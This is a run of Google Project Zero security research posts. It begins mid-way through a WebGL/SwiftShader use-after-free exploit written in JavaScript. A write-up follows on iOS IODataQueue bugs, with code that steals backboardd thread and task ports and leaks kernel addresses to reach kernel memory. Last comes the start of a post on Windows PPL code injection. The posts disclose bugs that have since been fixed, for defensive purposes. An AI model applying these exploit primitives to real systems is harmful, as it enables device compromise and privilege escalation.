 gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.fb);  gl.bindRenderbuffer(gl.RENDERBUFFER, uaf_rb);  gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA32UI, uaf_width, uaf_height);  gl.framebufferRenderbuffer(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, uaf_rb);
 let tex = gl.createTexture();  gl.bindTexture(gl.TEXTURE_CUBE_MAP, tex);  // trigger  for (i = 2; i < 0x10; ++i) {    gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);  }
 function unroll(gl) {    gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);    // snip ...    gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);  }
 for (i = 0x10; i < 0x100000000; i += 0x10) {    unroll(gl);  }
 // the egl::ImageImplementation for the rendertarget of uaf_rb is now 0, so  // this call will free it, leaving a dangling reference  gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, 256, 256, 0);
 // replace the allocation with our shader uniform.  gl.linkProgram(this.program);  gl.useProgram(this.program);
 function wait(ms) {    var start = Date.now(),    now = start;    while (now - start < ms) {      now = Date.now();    }  }
 function read(uaf, index) {    wait(200);    var read_data = new Int32Array(60);    for (var i = 0; i < 60; ++i) {      read_data[i] = gl.getUniform(uaf.program, gl.getUniformLocation(uaf.program, 'block' + index.toString() + '[' + i.toString() + ']'));    }    return read_data.buffer;  }
 function write(uaf, index, buffer) {    gl.uniform1iv(gl.getUniformLocation(uaf.program, 'block' + index.toString()), new Int32Array(buffer));    wait(200);  }
 this.read = function() {    return read(this, this.index);  }
 this.write = function(buffer) {    return write(this, this.index, buffer);  }
 for (var i = 0; i < 4; ++i) {    write(this, i, fake.buffer);  }
 gl.readPixels(0, 0, 2, 2, gl.RGBA_INTEGER, gl.UNSIGNED_INT, new Uint32Array(2 * 2 * 16));  for (var i = 0; i < 4; ++i) {    data = new DataView(read(this, i));    for (var j = 0; j < 0xf0; ++j) {      if (fake.getUint8(j) != data.getUint8(j)) {        log('uaf block index is ' + i.toString());        this.index = i;        return this;      }    }  }}
At this point we can modify the object to allow us to read and write from all of the GPU process’ memory; see the read_write function for how the gl.readPixels and gl.blitFramebuffer methods are used for this.
Now, it should be fairly trivial to get arbitrary code execution from this point, although it’s often a pain to get your ROP chain to line up nicely when you have to replace a c++ object, this is a very tractable problem. It turns out, though, that there’s another trick that will make this exploit more elegant.
SwiftShader uses JIT compilation of shaders to get as high performance as possible - and that JIT compiler uses another c++ object to handle loading and mapping the generated ELF executables into memory. Maybe we can create a fake object that uses our egl::ImageImplementation object as a SubzeroReactor::ELFMemoryStreamer object, and have the GPU process load an ELF file for us as a payload, instead of fiddling around ourselves?
We can - so by creating a fake vtable such that:egl::ImageImplementation::lockInternal -> egl::ImageImplementation::lockInternalegl::ImageImplementation::unlockInternal -> ELFMemoryStreamer::getEntryegl::ImageImplementation::release -> shellcode
When we then read from this image object, instead of returning pixels to javascript, we’ll execute our shellcode payload in the GPU process.
ConclusionsIt’s interesting that we can find directly javascript-accessible attack surface in some unlikely places in a modern browser codebase when we look at things sideways - avoiding the perhaps more obvious and highly contested areas such as the main javascript JIT engine.
In many codebases, there is a long history of development and there are many trade-offs made for compatibility and consistency across releases. It’s worth reviewing some of these to see whether the original expectations turned out to be valid after the release of these features, and if they still hold today, or if these features can actually be removed without significant impact to users.
Categories: Security

Deja-XNU

Thu, 10/18/2018 - 18:27
Posted by Ian Beer, Google Project Zero
This blog post revisits an old bug found by Pangu Team and combines it with a new, albeit very similar issue I recently found to try to build a "perfect" exploit for iOS 7.1.2.
State of the artAn idea I've wanted to play with for a while is to revisit old bugs and try to exploit them again, but using what I've learnt in the meantime about iOS. My hope is that it would give an insight into what the state-of-the-art of iOS exploitation could have looked like a few years ago, and might prove helpful if extrapolated forwards to think about what state-of-the-art exploitation might look like now.
So let's turn back the clock to 2014...
Pangu 7On June 23 2014 @PanguTeam released the Pangu 7 jailbreak for iOS 7.1-7.1.x. They exploited a lot of bugs. The issue we're interested in is CVE-2014-4461 which Apple described as: A validation issue ... in the handling of certain metadata fields of IOSharedDataQueue objects. This issue was addressed through relocation of the metadata.
(Note that this kernel bug wasn't actually fixed in iOS 8 and Pangu reused it for Pangu 8...)
Queuerious...Looking at the iOS 8-era release notes you'll see that Pangu and I had found some bugs in similar areas:
  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: A validation issue existed in the handling of certain metadata fields of IODataQueue objects. This issue was addressed through improved validation of metadata.
CVE-2014-4418 : Ian Beer of Google Project Zero
  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: A validation issue existed in the handling of certain metadata fields of IODataQueue objects. This issue was addressed through improved validation of metadata.
CVE-2014-4388 : @PanguTeam
  • IOKit

Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary code with system privileges
Description: An integer overflow existed in the handling of IOKit functions. This issue was addressed through improved validation of IOKit API arguments.
CVE-2014-4389 : Ian Beer of Google Project Zero
IODataQueueI had looked at the IOKit class IODataQueue, which the header file IODataQueue.h tells us "is designed to allow kernel code to queue data to a user process." It does this by creating a lock-free queue data-structure in shared memory.
IODataQueue was quite simple, there were only two fields: dataQueue and notifyMsg:
class IODataQueue : public OSObject{  OSDeclareDefaultStructors(IODataQueue)protected:  IODataQueueMemory * dataQueue;  void * notifyMsg;public:  static IODataQueue *withCapacity(UInt32 size);  static IODataQueue *withEntries(UInt32 numEntries, UInt32 entrySize);  virtual Boolean initWithCapacity(UInt32 size);  virtual Boolean initWithEntries(UInt32 numEntries, UInt32 entrySize);  virtual Boolean enqueue(void *data, UInt32 dataSize);  virtual void setNotificationPort(mach_port_t port);  virtual IOMemoryDescriptor *getMemoryDescriptor();};
Here's the entire implementation of IODataQueue, as it was around iOS 7.1.2:
OSDefineMetaClassAndStructors(IODataQueue, OSObject)
IODataQueue *IODataQueue::withCapacity(UInt32 size){    IODataQueue *dataQueue = new IODataQueue;
   if (dataQueue) {        if (!dataQueue->initWithCapacity(size)) {            dataQueue->release();            dataQueue = 0;        }    }
   return dataQueue;}
IODataQueue *IODataQueue::withEntries(UInt32 numEntries, UInt32 entrySize){    IODataQueue *dataQueue = new IODataQueue;
   if (dataQueue) {        if (!dataQueue->initWithEntries(numEntries, entrySize)) {            dataQueue->release();            dataQueue = 0;        }    }
   return dataQueue;}
Boolean IODataQueue::initWithCapacity(UInt32 size){    vm_size_t allocSize = 0;
   if (!super::init()) {        return false;    }
   allocSize = round_page(size + DATA_QUEUE_MEMORY_HEADER_SIZE);
   if (allocSize < size) {        return false;    }
   dataQueue = (IODataQueueMemory *)IOMallocAligned(allocSize, PAGE_SIZE);    if (dataQueue == 0) {        return false;    }
   dataQueue->queueSize    = size;    dataQueue->head         = 0;    dataQueue->tail         = 0;
   return true;}
Boolean IODataQueue::initWithEntries(UInt32 numEntries, UInt32 entrySize){    return (initWithCapacity((numEntries + 1) * (DATA_QUEUE_ENTRY_HEADER_SIZE + entrySize)));}
void IODataQueue::free(){    if (dataQueue) {        IOFreeAligned(dataQueue, round_page(dataQueue->queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE));    }
   super::free();
   return;}
Boolean IODataQueue::enqueue(void * data, UInt32 dataSize){    const UInt32       head = dataQueue->head;  // volatile    const UInt32       tail = dataQueue->tail;    const UInt32       entrySize = dataSize + DATA_QUEUE_ENTRY_HEADER_SIZE;    IODataQueueEntry * entry;
   if ( tail >= head )    {        // Is there enough room at the end for the entry?        if ( (tail + entrySize) <= dataQueue->queueSize )        {            entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);
           entry->size = dataSize;            memcpy(&entry->data, data, dataSize);
           // The tail can be out of bound when the size of the new entry            // exactly matches the available space at the end of the queue.            // The tail can range from 0 to dataQueue->queueSize inclusive.
           dataQueue->tail += entrySize;        }        else if ( head > entrySize ) // Is there enough room at the beginning?        {            // Wrap around to the beginning, but do not allow the tail to catch            // up to the head.
           dataQueue->queue->size = dataSize;
           // We need to make sure that there is enough room to set the size before            // doing this. The user client checks for this and will look for the size            // at the beginning if there isn't room for it at the end.
           if ( ( dataQueue->queueSize - tail ) >= DATA_QUEUE_ENTRY_HEADER_SIZE )            {                ((IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail))->size = dataSize;            }
           memcpy(&dataQueue->queue->data, data, dataSize);            dataQueue->tail = entrySize;        }        else        {            return false; // queue is full        }    }    else    {        // Do not allow the tail to catch up to the head when the queue is full.        // That's why the comparison uses a '>' rather than '>='.
       if ( (head - tail) > entrySize )        {            entry = (IODataQueueEntry *)((UInt8 *)dataQueue->queue + tail);
           entry->size = dataSize;            memcpy(&entry->data, data, dataSize);            dataQueue->tail += entrySize;        }        else        {            return false; // queue is full        }    }
   // Send notification (via mach message) that data is available.
   if ( ( head == tail )                /* queue was empty prior to enqueue() */    || ( dataQueue->head == tail ) )   /* queue was emptied during enqueue() */    {        sendDataAvailableNotification();    }
   return true;}
void IODataQueue::setNotificationPort(mach_port_t port){    static struct _notifyMsg init_msg = { {        MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0),        sizeof (struct _notifyMsg),        MACH_PORT_NULL,        MACH_PORT_NULL,        0,        0    } };
   if (notifyMsg == 0) {        notifyMsg = IOMalloc(sizeof(struct _notifyMsg));    }
   *((struct _notifyMsg *)notifyMsg) = init_msg;
   ((struct _notifyMsg *)notifyMsg)->h.msgh_remote_port = port;}
void IODataQueue::sendDataAvailableNotification(){    kern_return_t kr;    mach_msg_header_t * msgh;
   msgh = (mach_msg_header_t *)notifyMsg;    if (msgh && msgh->msgh_remote_port) {        kr = mach_msg_send_from_kernel_proper(msgh, msgh->msgh_size);        switch(kr) {            case MACH_SEND_TIMED_OUT: // Notification already sent            case MACH_MSG_SUCCESS:                break;            default:                IOLog("%s: dataAvailableNotification failed - msg_send returned: %d\n", /*getName()*/"IODataQueue", kr);                break;        }    }}
IOMemoryDescriptor *IODataQueue::getMemoryDescriptor(){    IOMemoryDescriptor *descriptor = 0;
   if (dataQueue != 0) {        descriptor = IOMemoryDescriptor::withAddress(dataQueue, dataQueue->queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE, kIODirectionOutIn);    }
   return descriptor;}
The ::initWithCapacity method allocates the buffer which will end up in shared memory. We can see from the cast that the structure of the memory looks like this:
typedef struct _IODataQueueMemory {    UInt32            queueSize;    volatile UInt32   head;    volatile UInt32   tail;    IODataQueueEntry  queue[1];} IODataQueueMemory;
The ::setNotificationPort method allocated a mach message header structure via IOMalloc when it was first called and stored the buffer as notifyMsg.
The ::enqueue method was responsible for writing data into the next free slot in the queue, potentially wrapping back around to the beginning of the buffer.
Finally, ::getMemoryDescriptor created an IOMemoryDescriptor object which wrapped the dataQueue memory to return to userspace.
IODataQueue.cpp was 243 lines, including license and comments. I count at least 6 bugs, which I've highlighted in the code. There's only one integer overflow check but there are multiple obvious integer overflow issues. The other problems stemmed from the fact that the only place where the IODataQueue was storing the queue's length was in the shared memory which userspace could modify.
This lead to obvious memory corruption issues in ::enqueue since userspace could alter the queueSize, head and tail fields and the kernel had no way to verify whether they were within the bounds of the queue buffer. The other two uses of the queueSize field also yielded interesting bugs: The ::free method has to trust the queueSize field, and so will make an oversized IOFree. Most interesting of all however is ::getMemoryDescriptor, which trusts queueSize when creating the IOMemoryDescriptor. If the kernel code which was using the IODataQueue allowed userspace to get multiple memory descriptors this would have let us get an oversized memory descriptor, potentially giving us read/write access to other kernel heap objects.
Back to PanguPangu's kernel code exec bug isn't in IODataQueue but in the subclass IOSharedDataQueue. IOSharedDataQueue.h tells us that the "IOSharedDataQueue class is designed to also allow a user process to queue data to kernel code."
IOSharedDataQueue adds one (unused) field:
   struct ExpansionData {    };    /*! @var reserved        Reserved for future use.  (Internal use only) */    ExpansionData * _reserved;

IOSharedDataQueue doesn't override the ::enqueue method, but adds a ::dequeue method to allow the kernel to dequeue objects which userspace has enqueued.
::dequeue had the same problems as ::enqueue with the queue size being in shared memory, which could lead the kernel to read out of bounds. But strangely that wasn't the only change in IOSharedDataQueue. Pangu noticed that IOSharedDataQueue also had a much more curious change in its overridden version of ::initWithCapacity:
Boolean IOSharedDataQueue::initWithCapacity(UInt32 size){    IODataQueueAppendix *   appendix;        if (!super::init()) {        return false;    }        dataQueue = (IODataQueueMemory *)IOMallocAligned(round_page(size + DATA_QUEUE_MEMORY_HEADER_SIZE + DATA_QUEUE_MEMORY_APPENDIX_SIZE), PAGE_SIZE);    if (dataQueue == 0) {        return false;    }
   dataQueue->queueSize = size;    dataQueue->head = 0;    dataQueue->tail = 0;        appendix = (IODataQueueAppendix *)((UInt8 *)dataQueue + size + DATA_QUEUE_MEMORY_HEADER_SIZE);    appendix->version = 0;    notifyMsg = &(appendix->msgh);    setNotificationPort(MACH_PORT_NULL);
   return true;}
IOSharedDataQueue increased the size of the shared memory buffer to also add space for an IODataQueueAppendix structure:
typedef struct _IODataQueueAppendix {    UInt32 version;    mach_msg_header_t msgh;} IODataQueueAppendix;
This contains a version field and, strangely, a mach message header. Then on this line:
 notifyMsg = &(appendix->msgh);
the notifyMsg member of the IODataQueue superclass is set to point in to that appendix structure.
Recall that IODataQueue allocated a mach message header structure via IOMalloc when a notification port was first set, so why did IOSharedDataQueue do it differently? About the only plausible explanation I can come up with is that a developer had noticed that the dataQueue memory allocation typically wasted almost a page of memory, because clients asked for a page-multiple number of bytes, then the queue allocation added a small header to that and rounded up to a page-multiple again. This change allowed you to save a single 0x18 byte kernel allocation per queue. Given that this change seems to have landed right around the launch date of the first iPhone, a memory constrained device with no swap, I could imagine there was a big drive to save memory.
But the question is: can you put a mach message header in shared memory like that?
What's in a message?Here's the definition of mach_msg_header_t, as it was in iOS 7.1.2:
typedef struct {  mach_msg_bits_t  msgh_bits;  mach_msg_size_t  msgh_size;  mach_port_t      msgh_remote_port;  mach_port_t      msgh_local_port;  mach_msg_size_t  msgh_reserved;  mach_msg_id_t    msgh_id;} mach_msg_header_t;
(The msgh_reserved field has since become msgh_voucher_port with the introduction of vouchers.)
Both userspace and the kernel appear at first glance to have the same definition of this structure, but upon closer inspection if you resolve all the typedefs you'll see this very important distinction:
userspace:typedef __darwin_mach_port_t mach_port_t;typedef __darwin_mach_port_name_t __darwin_mach_port_t;typedef __darwin_natural_t __darwin_mach_port_name_t; typedef unsigned int __darwin_natural_t
kernel:typedef ipc_port_t mach_port_t;typedef struct ipc_port *ipc_port_t;
In userspace mach_port_t is an unsigned 32-bit integer which is a task-local name for a port, but in the kernel a mach_port_t is a raw pointer to the underlying ipc_port structure.
Since the kernel is the one responsible for initializing the notification message, and is the one sending it, it seems that the kernel is writing kernel pointers into userspace shared memory!
Fast-forwardBefore we move on to writing a new exploit for that old issue let's jump forward to 2018, and why exactly I'm looking at this old code again.
I've recently spoken publicly about the importance of variant analysis, and I thought it was important to actually do some variant analysis myself before I gave that talk. By variant analysis, I mean taking a known security bug and looking for code which is vulnerable in a similar way. That could mean searching a codebase for all uses of a particular API which has exploitable edge cases, or even just searching for a buggy code snippet which has been copy/pasted into a different file.
Userspace queues and deja-xnuThis summer while looking for variants of the old IODataQueue issues I saw something I hadn't noticed before: as well as the facilities for enqueuing and dequeue objects to and from kernel-owned IODataQueues, the userspace IOKit.framework also contains code for creating userspace-owned queues, for use only between userspace processes.
The code for creating these queues isn't in the open-source IOKitUser package; you can only see this functionality by reversing the IOKit framework binary.
There are no users of this code in the IOKitUser source, but some reversing showed that the userspace-only queues were used by the com.apple.iohideventsystem MIG service, implemented in IOKit.framework and hosted by backboardd on iOS and hidd on MacOS. You can talk to this service from inside the app sandbox on iOS.
Reading the userspace __IODataQueueEnqueue method, which is used to enqueue objects into both userspace and kernel queues, I had a strong feeling of deja-xnu: It was trusting the queueSize value in the queue header in shared memory, just like CVE-2014-4418 from 2014 did. Of course, if the kernel is the other end of the queue then this isn't interesting (since the kernel doesn't trust these values) but we now know that there are userspace only queues, where the other end is another userspace process.
Reading more of the userspace IODataQueue handling code I noticed that unlike the kernel IODataQueue object, the userspace one had an appendix as well as header. And in that appendix, like IOSharedDataQueue, it stored a mach message header! Did this userspace IODataQueue have the same issue as the IOSharedDataQueue issue from Pangu 7/8? Let's look at the code:
IOReturn IODataQueueSetNotificationPort(IODataQueueMemory *dataQueue, mach_port_t notifyPort){    IODataQueueAppendix * appendix = NULL;    UInt32 queueSize = 0;                if ( !dataQueue )        return kIOReturnBadArgument;            queueSize = dataQueue->queueSize;        appendix = (IODataQueueAppendix *)((UInt8 *)dataQueue + queueSize + DATA_QUEUE_MEMORY_HEADER_SIZE);
   appendix->msgh.msgh_bits        = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);    appendix->msgh.msgh_size        = sizeof(appendix->msgh);    appendix->msgh.msgh_remote_port = notifyPort;    appendix->msgh.msgh_local_port  = MACH_PORT_NULL;    appendix->msgh.msgh_id          = 0;
   return kIOReturnSuccess;}
We can take a look in lldb at the contents of the buffer and see that at the end of the queue, still in shared memory, we can see a mach message header, where the name field is the remote end's name for the notification port we provided!
Exploitation of an arbitrary mach message sendIn XNU each task (process) has a task port, and each thread within a task has a thread port. Originally a send right to a task's task port gave full memory and thread control, and a send right to a thread port meant full thread control (which is of course also full memory control.)
As a result of the exploits which I and others have released abusing issues with mach ports to steal port rights Apple have very slowly been hardening these interfaces. But as of iOS 11.4.1 if you have a send right to a thread port belonging to another task you can still use it to manipulate the register state of that thread.
Interestingly process startup on iOS is sufficiently deterministic that in backboardd on iOS 7.1.2 on an iPhone 4 right up to iOS 11.4.1 on an iPhone SE, 0x407 names a thread port.
Stealing portsThe msgh_local_port field in a mach message is typically used to give the recipient of a message a send-once right to a "reply port" which can be used to send a reply. This is just a convention and any send or send-once right can be transferred here. So by rewriting the mach message in shared memory which will be sent to us to set the msgh_local_port field to 0x407 (backboardd's name for a thread port) and the msgh_bits field to use a COPY_SEND disposition for the local port, when the notification message is sent to us by backboardd we'll receive a send right to a backboardd thread port!
This exploit for this issue targets iOS 11.4.1, and contains a modified version of the remote_call code from triple_fetch to work with a stolen thread port rather than a task port.
Back to 2014I mentioned that Apple have slowly been adding mitigations against the use of stolen task ports. The first of these mitigations I'm aware of was to prevent userspace using the kernel task port, often known as task-for-pid-0 or TFP0, which is the task port representing the kernel task (and hence allowing read/write access to kernel memory). I believe this was done in response to my mach_portal exploit which used a kernel use-after-free to steal a send right to the kernel task port.
Prior to that hardening, if you had a send right to the kernel task port you had complete read/write access to kernel memory.
We've seen that port name allocation is extremely stable, with the same name for a thread port for four years. Is the situation similar for the ipc_port pointers used in the kernel in mach messages?
Very early kernel port allocation is also deterministic. I abused this in mach_portal to steal the kernel task port by first determining the address of the host port then guessing that the kernel task port must be nearby since they're both very early port allocations.
Back in 2014 things were even easier because the kernel task port was at a fixed offset from the host port; all we need to do is leak the address of the host port then we can compute the address of the kernel task port!
Determining port addressesIOHIDEventService is a userclient which exposes an IOSharedDataQueue to userspace. We can't open this from inside the app sandbox, but the exploit for the userspace IODataQueue bug was easy enough to backport to 32-bit iOS 7.1.2, and we can open an IOHIDEventService userclient from backboardd.
The sandbox only prevents us from actually opening the userclient connection. We can then transfer the mach port representing this connection back to our sandboxed app and continue the exploit from there. Using the code I wrote for triple_fetch we can easily use backboardd's task port which we stole (using the userspace IODataQueue bug) to open an IOKit userclient connection and move it back:
uint32_t remote_matching =  task_remote_call(bbd_task_port,                   IOServiceMatching,                   1,                   REMOTE_CSTRING("IOHIDEventService"));  uint32_t remote_service =  task_remote_call(bbd_task_port,                   IOServiceGetMatchingService,                   2,                   REMOTE_LITERAL(0),                   REMOTE_LITERAL(remote_matching));  uint32_t remote_conn = 0;uint32_t remote_err =  task_remote_call(bbd_task_port,                   IOServiceOpen,                   4,                   REMOTE_LITERAL(remote_service),                   REMOTE_LITERAL(0x1307), // remote mach_task_self()                   REMOTE_LITERAL(0),                   REMOTE_OUT_BUFFER(&remote_conn,                                     sizeof(remote_conn)));  mach_port_t conn =  pull_remote_port(bbd_task_port,                   remote_conn,                   MACH_MSG_TYPE_COPY_SEND);
We then just need to call external method 0 to "open" the queue and IOConnectMapMemory to map the queue shared memory into our process and find the mach message header:
vm_address_t qaddr = 0;vm_size_t qsize = 0;
IOConnectMapMemory(conn,                   0,                   mach_task_self(),                   &qaddr,                   &qsize,                   1);
mach_msg_header_t* shm_msg =  (mach_msg_header_t*)(qaddr + qsize - 0x18);
In order to set the queue's notification port we need to call IOConnectSetNotificationPort on the userclient:
mach_port_t notification_port = MACH_PORT_NULL;mach_port_allocate(mach_task_self(),                   MACH_PORT_RIGHT_RECEIVE,                   &notification_port);
uint64_t ref[8] = {0};IOConnectSetNotificationPort(conn,                             0,                             notification_port,                             ref);
We can then see the kernel address of that port's ipc_port in the shared memory message:
+0x00001010 00000013  // msgh_bits+0x00001014 00000018  // msgh_size+0x00001018 99a3e310  // msgh_remote_port+0x0000101c 00000000  // msgh_local_port+0x00001020 00000000  // msgh_reserved+0x00001024 00000000  // msgh_id

We now need to determine the heap address of an early kernel port. If we just call IOConnectSetNotificationPort with a send right to the host_self port, we get an error:
IOConnectSetNotificationPort error: 1000000a (ipc/send) invalid port right
This error is actually from the MIG client code telling us that the MIG serialized message failed to send. IOConnectSetNotificationPort is a thin wrapper around the MIG generated io_conenct_set_notification_port client code. Let's take a look in device.defs which is the source file used by MIG to generate the RPC stubs for IOKit:
routine io_connect_set_notification_port(    connection        : io_connect_t; in notification_type : uint32_t; in port              : mach_port_make_send_t; in reference         : uint32_t);
Here we can see that the port argument is defined as a mach_port_make_send_t which means that the MIG code will send the port argument in a port descriptor with a disposition of MACH_MSG_TYPE_MAKE_SEND, which requires the sender to hold a receive right. But in mach there is no way for the receiver to determine whether the sender held a receive right for a send right which you received or instead sent you a copy via MACH_MSG_TYPE_COPY_SEND. This means that all we need to do is modify the MIG client code to use a COPY_SEND disposition and then we can set the queue's notification port to any send right we can acquire, irrespective of whether we hold a receive right.
Doing this and passing the name we get from mach_host_self() we can learn the host port's kernel address:
host port: 0x8e30cee0
Leaking a couple of early ports which are likely to come from the same memory page and finding the greatest common factor gives us a good guess for the size of an ipc_port_t in this version of iOS:
master port: 0x8e30c690host port: 0x8e30cee0GCF(0x690, 0xee0) = 0x70
Looking at the XNU source we can see that the host port is allocated before the kernel task port, and since this was before the zone allocator freelist randomisation mitigation was introduced this means that the address of the kernel task port will be somewhere below the host port.
By setting the msgh_local_port field to the address of the host port - 0x70, then decrementing it by 0x70 each time we receive a notification message we will be sent a different early port each time a notification message is sent. Doing this we learn that the kernel task port is allocated 5 ports after the host port, meaning that the address of the kernel task port is host_port_kaddr - (5*0x70).
Putting it all togetherYou can get my exploit for iOS 7.1.2 here, I've only tested it on an iPhone 4. You'll need to use an old version of XCode to build and run it; I'm using XCode 7.3.1.
Launch the app, press the home button to trigger an HID notification message and enjoy read/write access to kernel memory. :)
In 2014 then it seems that with enough OS internals knowledge and the right set of bugs it was pretty easy to build a logic bug chain to get kernel memory read write. Things have certainly changed since then, but I'd be interested to compare this post with another one in 2022 looking back to 2018.
LessonsVariant analysis is really important, but attackers are the only parties incentivized to do a good job of it. Why did the userspace variant of this IODataQueue issue persist for four more years after almost the exact same bug was fixed in the kernel code?
Let's also not underplay the impact that just the userspace version of the bug alone could have had. Prior to mach_portal, due to a design quirk of the com.apple.iohideventsystem MIG service backboardd had send rights to a large number of other process's task ports, meaning that a compromise of backboardd was also a compromise of those tasks.
Some of those tasks ran as root meaning they could have exploited the processor_set_tasks vulnerability to get the task ports for any task on the device, which despite being a known issue also wasn't fixed until I exploited it in triple_fetch.
This IODataQueue issue wasn't the only variant I found as part of this project; the deja-xnu project for iOS 11.4.1 also contains PoC code to trigger a MIG code generation bug in clients of backboardd, and the project zero tracker has details of further issues.
A final note on security bulletinsYou'll notice that none of the issues I've linked above are mentioned in the iOS 12 security bulletin, despite being fixed in that release. Apple are still yet to assign CVEs for these issues or publicly acknowledge that they were fixed in iOS 12. In my opinion a security bulletin should mention the security bugs that were fixed. Not doing so provides a disincentive for people to update their devices since it appears that there were fewer security fixes that there really were.
Categories: Security

Injecting Code into Windows Protected Processes using COM - Part 1

Tue, 10/16/2018 - 12:34
Posted by James Forshaw, Google Project Zero
At Recon Montreal 2018 I presented “Unknown Known DLLs and other Code Integrity Trust Violations” with Alex Ionescu. We described the implementation of Microsoft Windows’ Code Integrity mechanisms and how Microsoft implemented Protected Processes (PP). As part of that I demonstrated various ways of bypassing Protected Process Light (PPL), some requiring administrator privileges, others not.
In this blog I’m going to describe the process I went through to discover a way of injecting code into a PPL on Windows 10 1803. As the only issue Microsoft considered to be violating a defended security boundary has now been fixed I can discuss the exploit in more detail.Background on Windows Protected ProcessesThe origins of the Windows Protected Process (PP) model stretch back to Vista where it was introduced to protect DRM processes. The protected process model was heavily restricted, limiting loaded DLLs to a subset of code installed with the operating system. Also for an executable to be considered eligible to be started protected it must be signed with a specific Microsoft certificate which is embedded in the binary. One protection that the kernel enforced is that a non-protected process couldn’t open a handle to a protected process with enough rights to inject arbitrary code or read memory.
In Windows 8.1 a new mechanism was introduced, Protected Process Light (PPL), which made the protection more generalized. PPL loosened some of the restrictions on what DLLs were considered valid for loading into a protected process and introduced different signing requirements for the main executable. Another big change was the introduction of a set of signing levels to separate out different types of protected processes. A PPL in one level can open for full access any process at the same signing level or below, with a restricted set of access granted to levels above. These signing levels were extended to the old PP model, a PP at one level can open all PP and PPL at the same signing level or below, however the reverse was not true, a PPL can never open a PP at any signing level for full access. Some of the levels and this relationship are shown below:
Signing levels allow Microsoft to open up protected processes to third-parties, although at the current time the only type of protected process that a third party can create is an Anti-Malware PPL. The Anti-Malware level is special as it allows the third party to add additional permitted signing keys by registering an Early Launch Anti-Malware (ELAM) certificate. There is also Microsoft’s TruePlay, which is an Anti-Cheat technology for games which uses components of PPL but it isn’t really important for this discussion.
I could spend a lot of this blog post describing how PP and PPL work under the hood, but I recommend reading the blog post series by Alex Ionescu instead (Parts 1, 2 and 3) which will do a better job. While the blog posts are primarily based on Windows 8.1, most of the concepts haven’t changed substantially in Windows 10.
I’ve written about Protected Processes before [link], in the form of the custom implementation by Oracle in their VirtualBox virtualization platform on Windows. The blog showed how I bypassed the process protection using multiple different techniques. What I didn’t mention at the time was the first technique I described, injecting JScript code into the process, also worked against Microsoft's PPL implementation. I reported that I could inject arbitrary code into a PPL to Microsoft (see Issue 1336) from an abundance of caution in case Microsoft wanted to fix it. In this case Microsoft decided it wouldn’t be fixed as a security bulletin. However Microsoft did fix the issue in the next major release on Windows (version 1803) by adding the following code to CI.DLL, the Kernel’s Code Integrity library:
UNICODE_STRING g_BlockedDllsForPPL[] = {
 DECLARE_USTR("scrobj.dll"),
 DECLARE_USTR("scrrun.dll"),
 DECLARE_USTR("jscript.dll"),
 DECLARE_USTR("jscript9.dll"),
 DECLARE_USTR("vbscript.dll")
};

NTSTATUS CipMitigatePPLBypassThroughInterpreters(PEPROCESS Process,
                                                LPBYTE Image,
                                                SIZE_T ImageSize) {
 if (!PsIsProtectedProcess(Process))
   return STATUS_SUCCESS;

 UNICODE_STRING OriginalImageName;
 // Get the original filename from the image resources.
 SIPolicyGetOriginalFilenameAndVersionFromImageBase(
     Image, ImageSize, &OriginalImageName);
 for(int i = 0; i < _countof(g_BlockedDllsForPPL); ++i) {
   if (RtlEqualUnicodeString(g_BlockedDllsForPPL[i],
                             &OriginalImageName, TRUE)) {
     return STATUS_DYNAMIC_CODE_BLOCKED;
   }
 }
 return STATUS_SUCCESS;
}
The fix checks the original file name in the resource section of the image being loaded against a blacklist of 5 DLLs. The blacklist includes DLLs such as JSCRIPT.DLL, which implements the original JScript scripting engine, and SCROBJ.DLL, which implements scriptlet objects. If the kernel detects a PP or PPL loading one of these DLLs the image load is rejected with STATUS_DYNAMIC_CODE_BLOCKED. This kills my exploit, if you modify the resource section of one of the listed DLLs the signature of the image will be invalidated resulting in the image load failing due to a cryptographic hash mismatch. It’s actually the same fix that Oracle used to block the attack in VirtualBox, although that was implemented in user-mode.Finding New TargetsThe previous injection technique using script code was a generic technique that worked on any PPL which loaded a COM object. With the technique fixed I decided to go back and look at what executables will load as a PPL to see if they have any obvious vulnerabilities I could exploit to get arbitrary code execution. I could have chosen to go after a full PP, but PPL seemed the easier of the two and I’ve got to start somewhere. There’s so many ways to inject into a PPL if we could just get administrator privileges, the least of which is just loading a kernel driver. For that reason any vulnerability I discover must work from a normal user account. Also I wanted to get the highest signing level I can get, which means PPL at Windows TCB signing level.
The first step was to identify executables which run as a protected process, this gives us the maximum attack surface to analyze for vulnerabilities. Based on the blog posts from Alex it seemed that in order to be loaded as PP or PPL the signing certificate needs a special Object Identifier (OID) in the certificate’s Enhanced Key Usage (EKU) extension. There are separate OID for PP and PPL; we can see this below with a comparison between WERFAULTSECURE.EXE, which can run as PP/PPL, and CSRSS.EXE, which can only run as PPL.

I decided to look for executables which have an embedded signature with these EKU OIDs and that’ll give me a list of all executables to look for exploitable behavior. I wrote the Get-EmbeddedAuthenticodeSignature cmdlet for my NtObjectManager PowerShell module to extract this information.
